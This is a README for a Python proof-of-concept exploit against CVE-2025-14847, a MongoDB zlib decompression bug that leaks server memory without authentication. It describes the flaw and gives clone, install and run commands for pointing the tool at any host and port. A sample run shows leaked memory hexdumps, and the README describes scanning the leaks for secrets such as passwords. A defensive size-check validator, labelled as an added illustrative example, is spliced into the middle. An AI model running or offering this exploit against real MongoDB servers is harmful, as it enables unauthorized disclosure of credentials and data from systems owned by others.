A proof‑of‑concept (PoC) exploit for the MongoDB zlib decompression vulnerability that allows unauthenticated attackers to read sensitive server memory.
The PoC is implemented in Python 3 and demonstrates how a malicious OP_COMPRESSED packet can trigger the bug, causing MongoDB to return uninitialized memory as BSON data.
The vulnerability is caused by a flaw in MongoDB’s zlib message decompression:
- A compressed message with an inflated `uncompressedSize` claim is sent.
- MongoDB allocates a large buffer based on that inflated value.
- zlib decompresses the actual data into the start of that buffer.
- MongoDB treats the entire buffer as valid data, leading to reading of uninitialized memory.
- BSON parsing then reads “field names” from that memory until a null byte is hit, exposing hidden data.
The PoC sends a crafted OP_COMPRESSED packet and parses the server’s error response to recover leaked data fragments.
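The size check that the steps above show to be missing, written as a defensive validator that a proxy or network sensor could run over captured wire messages. This is an added example, not code from the PoC or from MongoDB. The function names, the 48 MB cap and the sample frames are assumptions constructed for illustration.

```python
import struct
import zlib

OP_COMPRESSED = 2012        # wire-protocol opcode for compressed messages
ZLIB_ID = 2                 # compressorId value for zlib
MAX_INFLATED = 48_000_000   # assumed cap (MongoDB's default max message size)


def check_op_compressed(frame: bytes) -> str:
    """Return 'ok', 'not-compressed', 'skipped: ...' or a 'reject: ...' reason."""
    if len(frame) < 16:
        return "reject: short header"
    msg_len, _req, _resp, opcode = struct.unpack_from("<iiii", frame, 0)
    if msg_len != len(frame):
        return "reject: messageLength mismatch"
    if opcode != OP_COMPRESSED:
        return "not-compressed"
    if len(frame) < 25:
        return "reject: short OP_COMPRESSED body"
    # originalOpcode (int32), uncompressedSize (int32), compressorId (uint8)
    _orig, claimed, compressor = struct.unpack_from("<iiB", frame, 16)
    if compressor != ZLIB_ID:
        return "skipped: non-zlib compressor"
    if not 0 <= claimed <= MAX_INFLATED:
        return "reject: uncompressedSize out of range"
    inflater = zlib.decompressobj()
    try:
        # Cap output at claimed+1 bytes so an oversized stream cannot exhaust memory.
        actual = len(inflater.decompress(frame[25:], claimed + 1))
    except zlib.error:
        return "reject: bad zlib stream"
    # The claim is honest only if the stream ends at exactly `claimed` bytes.
    if actual != claimed or not inflater.eof or inflater.unused_data:
        return "reject: uncompressedSize mismatch"
    return "ok"


def build_frame(payload: bytes, claimed: int) -> bytes:
    """Constructed test input: zlib(payload) framed with a chosen size claim."""
    body = struct.pack("<iiB", 2013, claimed, ZLIB_ID) + zlib.compress(payload)
    return struct.pack("<iiii", 16 + len(body), 1, 0, OP_COMPRESSED) + body


if __name__ == "__main__":
    sample = b"constructed-sample-payload"  # placeholder bytes, not a real OP_MSG
    for claim in (len(sample), 8192):
        print(claim, check_op_compressed(build_frame(sample, claim)))
```

A message whose claimed size differs from what the zlib stream actually inflates to is rejected before any buffer of the claimed size would be trusted as data.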
| Component | Version | Notes |
|---|---|---|
| Python | ≥ 3.8 | The script is Python‑3 only |
| MongoDB | ≥ 4.4 | Target must be vulnerable to CVE‑2025‑14847 |
| Optional | requirements.txt | Provided in the repo |
```bash
# Clone the repo (or copy the script)
git clone https://github.com/lincemorado97/CVE-2025-14847.git
cd CVE-2025-14847
# (Optional) Install required Python packages
pip install -r requirements.txt
```

```bash
python exploit.py [OPTIONS]
```

| Option | Default | Description |
|---|---|---|
| `--host` | `localhost` | Target MongoDB host |
| `--port` | `27017` | Target MongoDB port |
| `--min-offset` | `20` | Minimum document length to probe |
| `--max-offset` | `8192` | Maximum document length to probe |
| `--output` | `leaked.bin` | File where leaked data is saved |

Example:
```bash
python exploit.py --host 10.0.0.5 --port 27017 --min-offset 50 --max-offset 5000 --output leaks.bin
```

```
$ python3 exploit.py
11:02:41 CVE-2025-14847 INFO │ [*] Target: localhost:27017
11:02:41 CVE-2025-14847 INFO │ [*] Scanning offsets 20-8192
11:02:41 CVE-2025-14847 INFO │ Offset Hex ASCII
11:02:41 CVE-2025-14847 INFO │ ---------------------------------------------------------------------------
11:02:41 CVE-2025-14847 INFO │ 00000000: 20 6f 62 6a 65 63 74 20 77 69 74 68 20 75 6e 6b | object with unk|
11:02:41 CVE-2025-14847 INFO │ 00000010: 6e 6f 77 6e 20 5f 69 64 |nown _id|
11:02:41 CVE-2025-14847 INFO │ [+] offset= 39 len= 24:
11:02:45 CVE-2025-14847 INFO │ Offset Hex ASCII
11:02:45 CVE-2025-14847 INFO │ ---------------------------------------------------------------------------
11:02:45 CVE-2025-14847 INFO │ 00000000: 73 20 73 6b 69 70 70 65 64 20 64 75 72 69 6e 67 |s skipped during|
11:02:45 CVE-2025-14847 INFO │ 00000010: 20 74 72 65 65 20 77 61 6c 6b | tree walk|
11:02:45 CVE-2025-14847 INFO │ [+] offset=3064 len= 26:
11:02:50 CVE-2025-14847 INFO │ Offset Hex ASCII
....
11:02:50 CVE-2025-14847 INFO │ [+] offset=6663 len= 38:
11:02:52 CVE-2025-14847 SUCCESS │ [*] Total leaked: 496 bytes
11:02:52 CVE-2025-14847 SUCCESS │ [*] Unique fragments: 85
11:02:52 CVE-2025-14847 SUCCESS │ [*] Saved to: leaked.bin
```

The script will log each interesting fragment (length > 10 bytes) and output a hexdump view. All leaked data is appended to leaked.bin.
- Hexdump: Shows a subset of the leaked data in both hex and ASCII.
- Log lines: `[+] offset= <doc_len> len= <len>` indicates where a fragment was found.
- Total leaked: Bytes written to the output file.
- Unique fragments: Distinct data blocks detected.
- Secret detection: The script prints any of the predefined patterns (`password`, `secret`, etc.) found in the leaked data.

- CVE-2025-14847 – https://nvd.nist.gov/vuln/detail/CVE-2025-14847
- Analysis: https://www.ox.security/blog/attackers-could-exploit-zlib-to-exfiltrate-data-cve-2025-14847/
This PoC is provided "as is" without any warranty. The author is not responsible for any misuse or damage caused by this script. Use it at your own risk.
